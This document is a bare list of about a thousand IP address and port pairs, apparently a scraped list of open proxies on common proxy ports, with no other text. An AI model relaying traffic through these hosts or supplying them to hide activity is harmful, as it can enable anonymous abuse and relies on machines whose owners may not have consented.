111.1.32.24:9064 111.1.32.24:9999 111.1.32.28:81 111.1.32.29:81 111.1.32.29:86 111.1.36.10:80 111.1.36.137:80 111.1.36.138:80 111.1.36.139:80 111.1.36.140:80 111.1.36.163:80 111.1.36.163:81 111.1.36.164:80 111.1.36.164:83 111.1.36.164:84 111.1.36.164:85 111.1.36.164:86 111.1.36.165:80 111.1.36.165:81 111.1.36.165:83 111.1.36.2:80 111.1.36.21:80 111.1.36.21:81 111.1.36.21:82 111.1.36.21:83 111.1.36.21:84 111.1.36.21:85 111.1.36.21:86 111.1.36.22:80 111.1.36.23:80 111.1.36.23:81 111.1.36.23:82 111.1.36.23:83 111.1.36.23:85 111.1.36.23:86 111.1.36.25:80 111.1.36.25:81 111.1.36.25:82 111.1.36.25:83 111.1.36.25:84 111.1.36.25:85 111.1.36.25:86 111.1.36.26:80 111.1.36.26:81 111.1.36.26:82 111.1.36.26:83 111.1.36.26:84 111.1.36.26:85 111.1.36.3:80 111.1.36.5:80 111.1.36.6:80 111.1.36.9:80 111.10.10.25:8123 111.10.100.152:8123 111.10.100.206:8123 111.10.100.229:8123 111.10.103.231:8123 111.10.103.8:8123 111.10.108.200:8123 111.10.108.89:8123 111.10.112.131:8123 111.10.113.41:8123 111.10.113.81:8123 111.10.114.109:8123 111.10.115.68:8123 111.10.116.124:8123 111.10.116.183:8123 111.10.116.254:8123 111.10.117.84:8123 111.10.118.13:8123 111.10.118.159:8123 111.10.118.97:8123 111.10.128.199:8123 111.10.129.83:8123 111.10.130.176:8123 111.10.136.193:8123 111.10.137.169:8123 111.10.138.190:8123 111.10.139.154:8123 111.10.139.3:8123 111.10.14.153:8123 111.10.144.188:8123 111.10.145.59:8123 111.10.147.224:8123 111.10.15.14:8123 111.10.153.171:8123 111.10.155.159:8123 111.10.156.35:8123 111.10.160.198:8123 111.10.160.72:8123 111.10.163.89:8123 111.10.165.125:8123 111.10.165.155:8123 111.10.166.130:8123 111.10.166.209:8123 111.10.167.246:8123 111.10.167.48:8123 111.10.167.90:8123 111.10.177.223:8123 111.10.178.246:8123 111.10.182.230:8123 111.10.189.17:8123 111.10.198.100:8123 111.10.83.93:8123 111.11.184.10:80 111.11.184.103:80 111.11.184.116:80 111.11.184.12:80 111.11.184.13:80 111.11.184.14:80 111.11.184.20:80 111.11.184.36:80 111.11.184.37:80 111.11.184.43:80 111.11.184.44:80 111.11.184.7:80 111.11.184.79:80 111.11.184.81:80 111.11.184.82:80 111.11.184.83:80 111.11.184.84:80 111.11.184.85:80 111.11.184.9:80 111.11.228.81:80 111.12.128.167:80 111.12.128.171:80 111.12.128.172:80 111.13.109.51:80 111.13.109.52:80 111.13.109.53:80 111.13.109.54:80 111.13.2.130:80 111.13.2.136:80 111.13.2.137:80 111.13.2.138:80 111.13.2.139:80 111.13.2.140:80 111.13.2.141:80 111.13.2.142:80 111.13.2.143:80 111.161.126.98:80 111.161.126.99:80 111.199.154.85:3128 111.206.81.248:80 111.221.1.254:8080 111.240.197.179:8088 111.240.97.94:9064 111.249.157.35:3128 111.249.95.80:9064 111.250.189.156:9064 111.250.233.6:3128 111.251.232.188:8088 111.252.249.231:8088 111.252.32.180:8088 111.254.142.200:8088 111.254.181.19:8088 111.254.45.161:9064 111.254.59.13:8088 111.3.82.148:8123 111.68.121.141:8080 111.7.129.140:80 111.7.129.140:8088 111.7.129.141:80 111.7.129.150:80 111.7.129.150:8088 111.7.129.151:80 111.7.129.151:8086 111.7.129.151:8088 111.7.129.160:80 111.7.129.162:80 111.8.20.136:80 111.8.20.141:80 111.9.124.150:8123 111.9.232.47:8123 111.9.233.113:8123 111.9.234.167:8123 111.9.234.193:8123 111.9.86.91:8123 111.93.234.98:3128 112.0.156.206:8123 112.1.184.23:8123 112.104.113.161:8088 112.105.215.77:8088 112.15.18.195:8123 112.17.0.201:80 112.17.0.202:80 112.17.0.203:80 112.17.0.204:80 112.17.0.205:80 112.17.0.211:80 112.17.0.213:80 112.17.0.214:80 112.17.0.215:80 112.17.0.216:80 112.18.165.199:8123 112.18.166.52:8123 112.18.171.122:8123 112.18.173.110:8123 112.18.174.31:8123 112.18.174.44:8123 112.18.176.104:8123 112.18.179.49:8123 112.18.196.121:8123 112.18.197.25:8123 112.18.21.195:8123 112.18.28.19:8123 112.18.52.252:8123 112.18.64.138:8123 112.18.72.137:8123 112.18.75.133:8123 112.18.88.48:8123 112.20.105.244:8123 112.20.122.50:8123 112.20.124.199:8123 112.20.148.163:8123 112.21.232.53:8123 112.22.126.72:8123 112.22.225.5:8123 112.22.228.9:8123 112.236.157.53:8585 112.24.124.157:8123 112.248.244.7:8585 112.25.43.3:3128 112.25.43.3:80 112.3.202.185:8123 112.44.229.135:8123 112.44.233.136:8123 112.44.247.170:8123 112.44.247.4:8123 112.5.16.50:80 112.65.18.17:8080 112.65.19.122:8080 112.65.212.74:3128 112.65.44.67:3128 112.91.208.78:9999 113.105.224.79:80 113.105.224.85:80 113.105.93.79:80 113.105.93.80:80 113.107.57.76:80 113.15.164.62:9999 113.162.133.235:80 113.19.87.107:8080 113.197.80.253:8080 113.200.220.151:8123 113.200.68.26:9000 113.201.63.12:80 113.214.13.1:8000 113.4.10.26:8118 113.53.249.131:8080 113.57.230.49:81 114.112.192.195:3128 114.231.23.140:8585 114.24.116.237:8088 114.24.172.68:8088 114.24.19.129:8088 114.24.4.19:8088 114.241.192.8:8585 114.247.120.114:3128 114.255.183.163:8080 114.255.183.173:8080 114.255.183.174:8080 114.26.241.175:9064 114.27.126.120:8088 114.27.126.49:8088 114.27.18.90:8088 114.27.5.18:9064 114.27.79.210:8088 114.36.6.48:9064 114.37.20.206:9064 114.37.26.213:8088 114.37.44.121:8088 114.38.196.145:8088 114.38.230.187:8088 114.38.36.200:8088 114.38.89.72:8088 114.39.187.196:8088 114.39.250.91:8088 114.40.110.122:9064 114.40.111.61:8088 114.40.205.50:9064 114.43.45.139:8088 114.44.0.98:8088 114.46.137.195:9064 114.66.229.2:80 114.79.135.42:9064 115.124.74.178:8080 115.236.59.194:3128 115.239.248.235:8080 116.228.55.217:8003 117.135.250.62:80 117.135.252.2:80 117.136.165.129:8123 117.139.28.168:8123 117.139.28.217:8123 117.139.39.75:8123 117.139.44.192:8123 117.139.47.69:8123 117.139.63.57:8123 117.139.65.237:8123 117.146.116.67:80 117.146.116.68:80 117.146.116.69:80 117.147.192.81:8123 117.147.195.68:8123 117.147.224.35:8123 117.147.246.181:8123 117.149.199.30:8123 117.149.218.110:8123 117.149.224.26:8123 117.149.234.93:8123 117.158.1.210:9999 117.162.124.188:8123 117.162.164.138:8123 117.162.168.201:8123 117.162.171.179:8123 117.162.173.237:8123 117.162.174.251:8123 117.162.193.126:8123 117.162.195.173:8123 117.162.201.77:8123 117.162.204.120:8123 117.162.216.173:8123 117.162.233.65:8123 117.162.238.139:8123 117.162.247.203:8123 117.162.70.148:8123 117.162.74.225:8123 117.162.80.48:8123 117.162.83.114:8123 117.162.84.146:8123 117.162.95.159:8123 117.163.109.69:8123 117.163.115.144:8123 117.163.119.129:8123 117.163.197.64:8123 117.163.202.212:8123 117.163.214.238:8123 117.163.216.119:8123 117.164.13.77:8123 117.164.151.112:8123 117.164.156.165:8123 117.164.157.188:8123 117.164.157.60:8123 117.164.158.249:8123 117.164.173.89:8123 117.164.205.150:8123 117.164.222.244:8123 117.164.28.112:8123 117.164.39.190:8123 117.164.58.11:8123 117.166.23.119:8123 117.166.237.137:8123 117.166.243.176:8123 117.166.41.70:8123 117.166.46.233:8123 117.166.74.162:8123 117.166.95.188:8123 117.166.96.26:8123 117.167.100.247:8123 117.169.207.95:8123 117.170.220.6:8123 117.170.222.231:8123 117.170.226.23:8123 117.170.230.73:8123 117.170.231.15:8123 117.170.231.18:8123 117.170.231.204:8123 117.170.242.116:8123 117.170.242.40:8123 117.170.4.99:8123 117.170.5.153:8123 117.170.5.177:8123 117.170.59.122:8123 117.170.7.95:8123 117.171.103.30:8123 117.171.124.96:8123 117.171.137.177:8123 117.171.162.167:8123 117.171.228.250:8123 117.171.231.2:8123 117.171.235.178:8123 117.171.235.205:8123 117.171.238.250:8123 117.171.26.6:8123 117.171.55.210:8123 117.171.64.214:8123 117.171.67.245:8123 117.173.20.220:8123 117.173.20.247:8123 117.173.20.32:8123 117.173.20.55:8123 117.173.245.229:8123 117.173.249.166:8123 117.173.254.165:8123 117.173.61.251:8123 117.174.1.198:8123 117.174.173.94:8123 117.174.195.207:8123 117.174.198.147:8123 117.174.200.136:8123 117.174.201.108:8123 117.174.209.27:8123 117.174.211.77:8123 117.174.223.247:8123 117.174.227.101:8123 117.174.228.204:8123 117.175.196.170:8123 117.175.212.88:8123 117.175.228.199:8123 117.175.229.134:8123 117.175.229.179:8123 117.175.229.75:8123 117.175.230.180:8123 117.175.241.196:8123 117.175.32.47:8123 117.176.185.24:8123 117.21.192.7:80 117.58.241.15:8080 117.59.217.240:80 117.59.217.240:81 117.59.217.240:82 117.59.217.240:83 118.95.177.186:9064 118.97.172.58:80 118.97.191.206:8080 118.97.66.4:8080 118.97.95.182:8080 118.99.85.7:8080 119.110.71.126:8080 119.254.76.225:808 119.4.115.51:8090 119.4.95.135:80 119.4.95.136:80 119.40.97.2:8080 119.48.23.15:9999 119.6.136.126:80 119.6.136.126:81 119.97.146.152:80 12.167.84.237:8080 120.194.107.149:9999 120.198.243.111:80 120.198.243.113:80 120.198.243.114:80 120.198.243.115:8080 120.198.243.115:8888 120.198.243.116:80 120.198.243.130:80 120.198.243.131:80 120.198.243.14:80 120.198.243.15:80 120.198.243.151:80 120.198.243.48:80 120.198.243.50:80 120.198.243.52:80 120.198.243.78:80 120.198.243.78:81 120.198.243.79:80 120.198.243.82:80 120.198.243.86:80 120.202.249.230:80 120.203.124.188:8123 120.203.151.29:8123 120.203.154.49:8123 120.203.158.99:8123 120.203.166.88:8123 120.203.173.68:8123 120.203.175.136:8123 120.203.214.144:80 120.203.214.144:81 120.203.214.144:82 120.203.214.144:83 120.203.214.144:84 120.203.214.147:80 120.203.214.147:81 120.203.214.147:82 120.203.214.147:83 120.203.214.147:84 120.203.214.151:80 120.203.214.183:80 120.203.214.187:80 120.203.214.187:9090 120.203.215.11:80 120.203.215.11:81 120.203.215.19:80 120.203.231.212:8123 120.203.232.192:8123 120.203.233.58:8123 120.206.109.21:8123 120.206.111.16:8123 120.206.112.25:8123 120.206.132.22:8123 120.206.132.41:8123 120.206.134.111:8123 120.206.139.70:8123 120.206.140.18:8123 120.206.140.49:8123 120.206.143.237:8123 120.206.143.30:8123 120.206.145.72:8123 120.206.147.125:8123 120.206.176.243:8123 120.206.194.66:8123 120.206.79.218:8123 122.156.137.188:8585 122.227.199.178:9999 122.254.25.136:9064 122.96.59.103:83 122.96.59.103:843 122.96.59.105:80 122.96.59.105:81 122.96.59.105:82 122.96.59.106:82 123.119.164.102:9000 123.150.207.105:80 123.177.20.220:80 123.195.188.190:9064 124.123.244.15:9064 124.123.42.135:9064 124.206.241.221:3128 124.240.187.79:82 124.240.187.79:83 124.240.187.80:80 124.240.187.81:83 124.6.135.170:3128 124.82.27.236:8080 124.88.67.19:80 125.164.125.239:3128 125.209.116.29:8080 125.212.193.2:3128 125.212.216.85:80 125.24.77.62:80 125.24.77.91:8080 125.24.78.154:80 125.24.78.223:8080 125.24.78.98:80 125.24.78.98:8080 125.24.79.234:80 125.24.79.235:8080 125.33.113.49:3128 125.39.66.66:80 125.39.66.67:80 125.39.66.68:80 125.39.66.75:80 125.39.66.75:8080 125.39.66.76:80 125.39.66.76:8080 125.42.176.208:9999 125.88.162.20:9999 125.88.255.143:80 125.88.255.144:80 125.89.74.233:3128 125.89.74.239:3128 125.89.74.240:3128 128.199.224.118:8080 130.0.25.162:8080 130.14.29.110:80 130.14.29.111:80 130.14.29.120:80 130.185.81.141:3128 131.155.186.8:3128 131.72.105.1:8080 133.18.6.22:80 139.193.62.12:8080 14.114.244.161:9999 14.136.79.252:9064 14.167.9.111:80 14.18.16.71:80 14.18.237.150:8085 140.109.57.11:9590 140.112.214.1:9064 140.113.156.111:9064 140.113.241.221:9064 140.116.88.78:8888 140.119.137.22:9064 140.121.197.169:8080 140.123.122.211:9064 140.129.1.183:3128 140.134.140.57:9064 140.206.86.70:8080 141.85.204.71:1920 146.148.66.106:80 146.185.149.184:3128 149.255.255.242:80 149.255.255.250:80 152.26.69.36:8080 152.26.69.37:8080 154.65.4.90:8080 158.58.172.207:13374 158.58.172.207:14826 158.58.172.207:15692 158.58.172.207:19279 158.58.172.207:33919 158.58.172.207:33948 158.58.172.207:33965 158.58.172.207:34015 158.58.172.207:80 159.255.167.147:8080 162.208.49.45:7808 162.208.49.45:8089 162.243.205.210:3128 163.125.206.206:9999 163.177.79.4:80 163.177.79.5:80 163.28.10.162:8888 163.53.187.98:8080 168.63.255.195:8080 171.12.3.71:81 173.201.185.40:80 175.101.16.72:80 175.101.16.72:8080 175.138.194.103:8080 175.184.250.18:8080 175.99.126.38:80 176.241.83.173:8080 176.73.252.139:3128 176.99.6.237:3128 177.104.25.130:3128 177.124.62.106:3128 177.130.92.69:3128 177.17.167.18:8080 177.200.82.234:8080 177.207.112.140:8080 177.22.111.120:8080 177.223.0.213:8080 177.54.192.163:8080 177.64.93.97:3128 177.67.100.82:8080 177.75.42.33:8080 177.80.18.115:3128 177.99.164.171:8080 177.99.74.182:8080 178.124.157.187:8080 178.137.138.96:8080 178.18.25.151:8888 178.219.248.15:8080 178.254.153.158:8080 178.32.72.26:8089 178.74.68.74:8080 178.77.243.110:443 179.154.253.192:3128 180.109.8.115:8585 180.174.62.185:80 180.176.102.224:9064 180.177.222.51:8088 180.183.25.223:3128 180.183.250.69:8080 180.183.51.139:3128 180.218.44.226:9064 180.242.40.184:8080 180.250.172.182:8080 180.250.215.251:8080 180.250.43.88:8080 180.250.44.250:80 181.208.104.156:9064 181.225.58.104:9064 181.49.15.162:3128 181.72.4.115:9064 181.73.26.240:9064 182.118.23.7:8081 182.18.161.71:3128 182.235.110.89:8088 182.235.133.197:8088 182.235.169.169:9064 182.235.222.142:9064 182.239.127.137:80 182.239.127.140:80 182.239.95.134:80 182.239.95.136:80 182.239.95.137:80 182.239.95.139:80 182.254.178.190:3128 182.254.212.164:80 182.254.221.192:8080 182.30.3.169:8080 182.36.82.12:8585 182.48.116.51:8080 182.52.49.157:80 182.70.37.75:3128 183.203.12.166:80 183.203.22.68:80 183.203.22.81:80 183.203.22.87:80 183.203.22.90:80 183.203.22.91:80 183.203.22.96:80 183.203.22.97:80 183.203.23.18:80 183.203.8.147:8080 183.203.8.148:8080 183.206.87.177:8123 183.207.224.13:80 183.207.224.14:80 183.207.224.42:80 183.207.224.43:80 183.207.224.44:80 183.207.224.45:80 183.207.224.47:80 183.207.224.48:80 183.207.224.49:80 183.207.224.49:81 183.207.224.50:81 183.207.224.50:85 183.207.224.51:83 183.207.224.51:84 183.207.224.52:80 183.207.224.52:81 183.207.229.12:80 183.207.229.12:8000 183.207.229.13:80 183.207.229.13:9000 183.207.229.139:80 183.207.229.194:80 183.207.229.195:80 183.207.229.199:80 183.207.229.202:80 183.207.229.203:80 183.207.237.11:80 183.207.237.18:80 183.207.237.18:81 183.207.237.21:80 183.208.196.120:8123 183.208.197.72:8123 183.208.200.131:8123 183.208.201.107:8123 183.208.213.193:8123 183.208.214.53:8123 183.208.222.149:8123 183.208.222.53:8123 183.208.35.12:8123 183.209.102.9:8123 183.209.107.226:8123 183.209.7.236:8123 183.211.110.131:8123 183.211.116.163:8123 183.211.5.29:8123 183.211.70.92:8123 183.211.72.156:8123 183.212.85.65:8123 183.212.95.68:8123 183.216.174.60:8123 183.216.176.124:8123 183.216.182.103:8123 183.216.189.171:8123 183.216.31.212:8123 183.216.57.48:8123 183.216.62.5:8123 183.217.140.33:8123 183.217.142.171:8123 183.217.189.61:8123 183.217.202.204:8123 183.217.204.233:8123 183.217.206.200:8123 183.217.232.56:8123 183.217.243.156:8123 183.218.103.32:8123 183.218.108.243:8123 183.218.122.95:8123 183.218.67.18:8123 183.218.85.93:8123 183.219.136.247:8123 183.219.137.144:8123 183.219.138.212:8123 183.219.140.46:8123 183.219.149.178:8123 183.219.153.83:8123 183.219.160.162:8123 183.219.2.65:8123 183.219.247.96:8123 183.219.248.70:8123 183.219.249.61:8123 183.219.46.155:8123 183.219.5.241:8123 183.219.50.200:8123 183.219.6.122:8123 183.219.83.67:8123 183.219.85.151:8123 183.219.88.140:8123 183.219.89.69:8123 183.219.90.133:8123 183.219.91.24:8123 183.219.94.67:8123 183.220.194.59:8123 183.220.199.223:8123 183.220.240.15:8123 183.220.240.240:8123 183.220.241.218:8123 183.220.245.2:8123 183.220.246.160:8123 183.220.247.135:8123 183.220.247.243:8123 183.220.44.239:8123 183.220.45.139:8123 183.221.147.193:8123 183.221.160.29:8123 183.221.164.91:8123 183.221.174.192:8123 183.221.175.177:8123 183.221.186.167:8123 183.221.188.161:8123 183.221.191.187:8123 183.221.191.198:8123 183.221.191.240:8123 183.221.208.185:8123 183.222.152.197:8123 183.222.153.242:8123 183.222.154.162:8123 183.222.156.12:8123 183.222.156.51:8123 183.222.157.227:8123 183.222.158.10:8123 183.222.158.150:8123 183.222.159.250:8123 183.222.160.21:8123 183.222.161.78:8123 183.222.163.68:8123 183.222.171.236:8123 183.222.174.137:8123 183.222.176.113:8123 183.222.183.37:8123 183.222.255.144:8123 183.222.87.110:8123 183.222.87.239:8123 183.223.16.2:8123 183.223.171.241:8123 183.223.172.31:8123 183.223.173.175:8123 183.223.35.63:8123 183.224.1.30:80 183.224.12.76:80 183.224.12.81:80 183.227.210.73:8123 183.228.142.252:8123 183.228.142.78:8123 183.228.156.176:8123 183.228.176.207:8123 183.228.176.47:8123 183.228.177.3:8123 183.228.179.113:8123 183.228.180.85:8123 183.228.182.71:8123 183.228.200.133:8123 183.228.201.154:8123 183.228.205.64:8123 183.228.206.3:8123 183.228.209.120:8123 183.228.209.6:8123 183.228.210.248:8123 183.228.222.175:8123 183.228.238.59:8123 183.228.239.134:8123 183.228.239.70:8123 183.228.243.115:8123 183.228.243.147:8123 183.228.249.139:8123 183.228.251.7:8123 183.228.39.228:8123 183.228.39.246:8123 183.228.39.68:8123 183.228.40.4:8123 183.228.41.213:8123 183.228.42.183:8123 183.228.68.178:8123 183.228.78.93:8123 183.228.79.184:8123 183.228.88.130:8123 183.228.88.46:8123 183.230.53.153:8123 183.247.235.21:8123 183.249.23.148:8123 183.249.33.202:8123 183.249.6.133:80 183.57.78.62:8085 183.82.131.183:9064 183.83.108.60:9064 183.83.87.150:9064 183.89.78.116:8080 183.89.92.242:3128 184.105.18.253:8085 186.136.180.233:8080 186.89.130.234:9064 186.89.253.70:8080 186.89.65.213:8080 186.89.90.103:9064 186.90.78.254:9064 186.90.79.190:8080 186.91.95.149:9064 186.92.112.11:8080 186.92.155.55:9064 186.92.163.128:9064 186.92.173.190:9064 186.92.198.65:8080 186.92.199.190:8080 186.92.199.246:8080 186.92.228.141:9064 186.92.4.99:9064 186.92.45.190:8080 186.93.111.198:8080 186.93.153.85:8080 186.93.19.34:9064 186.93.2.196:9064 186.93.203.224:8080 186.93.231.228:8080 186.93.30.229:9064 186.94.127.192:8080 186.94.143.54:8080 186.94.146.142:9064 186.94.190.53:9064 186.94.2.57:8080 186.94.224.8:9064 186.94.225.192:9064 186.94.241.175:9064 186.94.253.225:9064 186.94.34.32:8080 186.94.35.87:9064 186.94.59.50:8080 186.94.64.115:8080 186.95.228.109:8080 186.95.243.202:9064 186.95.47.172:8080 186.95.50.205:9064 186.96.253.146:8080 187.120.34.166:3128 187.120.34.246:3128 187.120.34.25:3128 187.120.34.66:3128 187.72.134.241:3128 187.73.175.23:3128 189.84.176.185:3128 189.85.20.189:8080 190.0.48.2:8080 190.128.238.38:8080 190.153.116.27:8080 190.183.115.148:9064 190.183.177.235:9064 190.184.144.174:8080 190.184.144.78:8080 190.198.134.200:9064 190.198.154.226:8080 190.198.178.228:9064 190.198.180.106:9064 190.198.2.148:8080 190.198.216.80:8080 190.198.227.114:8080 190.198.254.141:8080 190.198.27.169:9064 190.198.27.97:9064 190.198.80.240:8080 190.199.183.246:9064 190.199.218.90:8080 190.199.67.95:8080 190.199.71.123:9064 190.200.155.27:8080 190.200.157.6:8080 190.200.16.228:9064 190.200.185.216:9064 190.200.189.115:9064 190.200.217.151:8080 190.201.142.135:8080 190.201.154.134:9064 190.201.165.152:9064 190.201.167.141:9064 190.201.170.94:9064 190.201.216.72:9064 190.201.40.238:9064 190.202.194.152:9064 190.202.244.165:8080 190.203.132.250:8080 190.203.201.100:8080 190.203.239.67:8080 190.203.43.97:9064 190.204.1.2:9064 190.204.101.28:8080 190.204.122.129:8080 190.204.160.33:8080 190.204.168.253:8080 190.204.173.227:8080 190.204.242.235:8080 190.204.255.232:8080 190.204.26.213:9064 190.204.29.122:9064 190.204.55.110:9064 190.204.67.235:9064 190.205.123.55:8080 190.205.127.253:8080 190.205.192.9:8080 190.205.193.204:9064 190.205.196.77:9064 190.205.202.104:8080 190.205.220.126:8080 190.205.225.226:9064 190.207.149.102:8080 190.207.185.119:8080 190.207.200.185:8080 190.207.203.228:8080 190.207.208.168:9064 190.207.219.164:3128 190.207.228.97:9064 190.207.24.170:8080 190.207.253.107:9064 190.207.34.65:8080 190.207.56.83:9064 190.207.63.222:8080 190.217.215.194:9064 190.36.11.61:9064 190.36.143.123:8080 190.36.152.23:9064 190.36.154.15:8080 190.36.214.44:8080 190.36.72.1:9064 190.36.8.130:9064 190.36.8.26:9064 190.37.122.118:8080 190.37.122.163:8080 190.37.164.82:9064 190.37.165.72:9064 190.37.211.186:9064 190.37.224.236:8080 190.37.225.158:8080 190.37.231.178:8080 190.37.232.155:8080 190.37.239.21:9064 190.37.34.104:8080 190.37.48.121:8080 190.37.57.100:8080 190.37.77.86:8080 190.38.122.59:9064 190.38.123.239:9064 190.38.157.98:9064 190.38.178.28:8080 190.38.218.87:8080 190.38.29.145:9064 190.38.44.178:8080 190.38.45.9:8080 190.38.5.195:8080 190.38.54.32:8080 190.38.64.85:8080 190.38.68.219:8080 190.38.88.204:9064 190.38.94.86:8080 190.38.97.254:9064 190.39.105.142:9064 190.39.107.127:8080 190.39.169.183:9064 190.39.252.172:9064 190.39.67.73:8080 190.39.68.174:8080 190.39.75.247:8080 190.39.94.169:8080 190.40.123.36:8080 190.44.73.74:9064 190.52.32.126:3128 190.72.120.118:9064 190.72.15.242:8080 190.72.15.87:8080 190.72.153.86:8080 190.72.157.20:9064 190.72.191.194:9064 190.72.225.106:8080 190.72.6.206:9064 190.73.105.81:8080 190.73.11.143:8080 190.73.185.34:9064 190.73.216.119:8080 190.73.233.182:8080 190.73.252.90:9064 190.73.96.171:8080 190.74.146.224:8080 190.74.162.46:9064 190.74.165.158:8080 190.74.165.207:9064 190.74.168.149:8080 190.74.180.79:8080 190.74.186.36:9064 190.74.199.171:8080 190.74.200.117:9064 190.74.202.231:9064 190.74.203.4:8080 190.74.90.109:9064 190.75.137.251:9064 190.75.139.217:8080 190.75.139.61:9064 190.75.194.53:8080 190.75.206.79:9064 190.75.211.152:9064 190.75.238.227:9064 190.75.239.216:9064 190.75.33.152:9064 190.75.35.65:8080 190.77.219.159:8080 190.77.221.130:9064 190.77.230.141:8080 190.77.245.52:9064 190.78.151.16:9064 190.78.178.185:9064 190.78.178.6:8080 190.78.23.90:8080 190.78.24.108:9064 190.78.98.178:9064 190.78.99.152:9064 190.79.105.115:8080 190.79.107.130:9064 190.79.151.178:8080 190.79.222.12:9064 190.79.6.136:9064 190.94.202.13:9064 190.94.216.250:9064 190.98.205.107:80 191.105.121.101:9064 191.240.57.212:8080 191.241.76.52:8080 191.37.238.135:8080 191.37.238.169:8080 192.163.255.175:3128 192.3.104.245:80 192.3.162.138:3128 192.99.3.129:3128 194.125.224.125:3128 194.126.140.247:80 194.186.43.22:3128 194.213.60.227:8585 194.247.12.106:3128 194.247.165.118:8080 194.44.153.89:3128 194.8.248.22:3128 195.114.125.81:8080 195.154.77.104:3128 198.251.67.194:8080 198.46.103.108:80 198.52.217.44:7808 198.52.217.44:8089 198.71.193.192:80 198.71.213.94:80 199.167.228.36:80 199.200.120.140:8089 199.200.120.36:7808 199.200.120.37:7808 200.109.137.60:8080 200.112.211.16:8080 200.124.112.24:3128 200.143.198.83:3128 200.174.182.103:8080 200.192.248.94:8080 200.223.4.138:8081 200.242.145.3:3128 200.69.206.157:8080 200.90.86.38:8080 200.93.69.164:9064 201.208.204.219:9064 201.208.30.218:8080 201.208.37.148:8080 201.209.198.47:9064 201.209.220.178:8080 201.209.233.75:9064 201.209.240.8:9064 201.209.31.248:8080 201.209.47.77:9064 201.209.53.85:9064 201.210.222.209:9064 201.210.233.167:8080 201.210.249.226:9064 201.210.69.228:8080 201.211.109.142:8080 201.211.120.56:8080 201.211.129.156:9064 201.22.217.194:8080 201.221.131.62:8080 201.221.131.92:8080 201.221.132.69:3128 201.221.133.182:8080 201.238.203.66:3128 201.240.215.147:3128 201.242.185.129:8080 201.242.80.177:8080 201.242.93.133:9064 201.242.93.177:8080 201.243.104.100:9064 201.243.111.111:9064 201.243.126.125:8080 201.243.16.66:8080 201.243.175.209:9064 201.243.207.40:9064 201.243.96.183:8080 201.243.96.251:8080 201.248.18.112:8080 201.248.9.40:9064 201.55.143.1:3128 202.103.150.70:8088 202.108.50.75:80 202.109.163.75:8085 202.112.114.27:3128 202.117.1.122:8080 202.120.188.104:80 202.133.104.106:80 202.133.104.106:8080 202.141.225.126:8080 202.152.6.10:80 202.152.6.10:8080 202.152.61.44:8080 202.169.225.204:80 202.169.225.204:8080 202.171.253.134:80 202.171.253.135:80 202.171.253.72:80 202.171.253.84:85 202.171.253.84:86 202.29.238.242:3128 202.53.170.134:8080 202.77.115.71:54321 202.78.206.83:8080 202.91.73.30:8080 202.99.172.244:3128 203.128.71.247:8080 203.151.21.184:3128 203.176.136.66:8080 203.195.132.244:3128 203.202.250.98:3128 203.73.233.144:8088 203.81.67.86:8080 207.108.136.68:443 209.150.233.83:80 210.101.131.232:8080 210.13.105.23:8080 210.140.155.65:80 210.186.158.210:9064 210.209.72.236:80 210.245.20.170:80 210.65.10.76:3128 210.70.253.27:3128 210.73.218.136:3128 210.82.92.77:3128 211.138.121.37:80 211.138.121.37:81 211.138.121.37:82 211.138.121.37:83 211.138.121.37:84 211.138.121.38:80 211.138.121.38:81 211.138.121.38:82 211.138.121.38:83 211.138.60.16:80 211.138.60.18:80 211.139.45.22:8123 211.143.146.239:80 211.143.146.239:82 211.143.146.239:83 211.143.146.239:843 211.155.230.38:808 211.166.8.27:80 212.156.157.86:8080 212.158.155.22:8080 212.200.131.83:80 212.200.131.83:8080 216.120.236.190:3128 217.12.215.22:3128 218.108.232.99:80 218.166.101.107:8088 218.173.47.80:9064 218.173.73.10:9064 218.201.21.142:80 218.201.21.145:80 218.201.21.148:80 218.201.21.153:80 218.201.38.49:80 218.203.13.169:80 218.203.13.169:81 218.203.13.169:82 218.203.13.169:83 218.203.13.169:84 218.203.13.172:80 218.203.13.173:80 218.203.13.175:80 218.203.13.176:80 218.203.13.177:80 218.204.120.37:8123 218.204.156.111:8123 218.204.159.57:8123 218.206.83.89:80 218.207.10.178:8123 218.207.17.163:8123 218.207.172.236:80 218.207.172.237:80 218.207.51.19:8123 218.207.52.55:8123 218.207.55.162:8123 218.26.13.155:63000 218.27.136.169:8085 218.28.96.39:3128 218.29.155.198:9999 218.29.90.30:9999 218.75.205.124:9999 218.75.205.57:9999 219.93.183.106:8080 220.129.173.150:9064 220.136.166.222:9064 220.173.235.202:9999 220.231.32.195:3128 221.0.182.5:808 221.172.143.166:9000 221.176.14.72:80 221.178.119.219:8123 221.178.119.233:8123 221.178.121.198:8123 221.178.124.80:8123 221.178.127.170:8123 221.178.24.55:8123 221.178.28.215:8123 221.178.29.169:8123 221.178.30.200:8123 221.178.30.253:8123 221.178.30.30:8123 221.178.32.109:8123 221.178.53.85:8123 221.178.54.134:8123 221.178.55.55:8123 221.178.78.102:8123 221.178.83.50:8123 221.178.84.49:8123 221.178.86.157:8123 221.178.86.224:8123 221.178.98.82:8123 221.178.99.130:8123 221.180.130.48:80 221.180.130.49:80 221.180.130.50:80 221.180.130.51:80 221.180.147.30:80 221.180.147.30:81 221.180.147.30:83 221.180.147.30:86 221.182.110.141:8123 221.182.62.114:9999 221.182.62.32:8123 221.182.74.154:8123 221.182.74.46:8123 221.182.75.186:8123 221.182.75.205:8123 221.182.75.80:8123 221.183.16.219:80 221.231.135.149:80 221.5.69.51:80 221.5.69.51:8000 222.124.149.178:3128 222.129.205.199:9000 222.132.29.10:8080 222.246.232.55:80 222.35.17.177:8080 222.50.14.100:9000 222.66.97.75:8080 222.85.1.123:8118 222.85.103.192:81 222.85.149.4:3128 222.88.236.236:81 222.88.236.236:82 222.88.236.236:83 222.88.242.213:9999 223.252.33.209:23684 223.66.80.235:8123 223.67.148.169:8123 223.82.14.151:8123 223.82.169.151:8123 223.82.171.161:8123 223.82.171.176:8123 223.82.203.120:8123 223.82.204.182:8123 223.82.217.177:8123 223.82.217.28:8123 223.82.218.166:8123 223.82.37.67:8123 223.82.39.59:8123 223.82.42.148:8123 223.82.67.22:8123 223.82.74.214:8123 223.83.136.97:8123 223.83.137.26:8123 223.83.141.95:8123 223.83.201.241:8123 223.83.206.200:8123 223.84.130.224:8123 223.84.131.211:8123 223.84.133.12:8123 223.84.138.112:8123 223.84.143.179:8123 223.84.145.42:8123 223.84.147.193:8123 223.84.160.160:8123 223.84.19.45:8123 223.84.195.89:8123 223.84.206.174:8123 223.84.206.44:8123 223.84.216.238:8123 223.84.221.130:8123 223.84.229.77:8123 223.84.232.62:8123 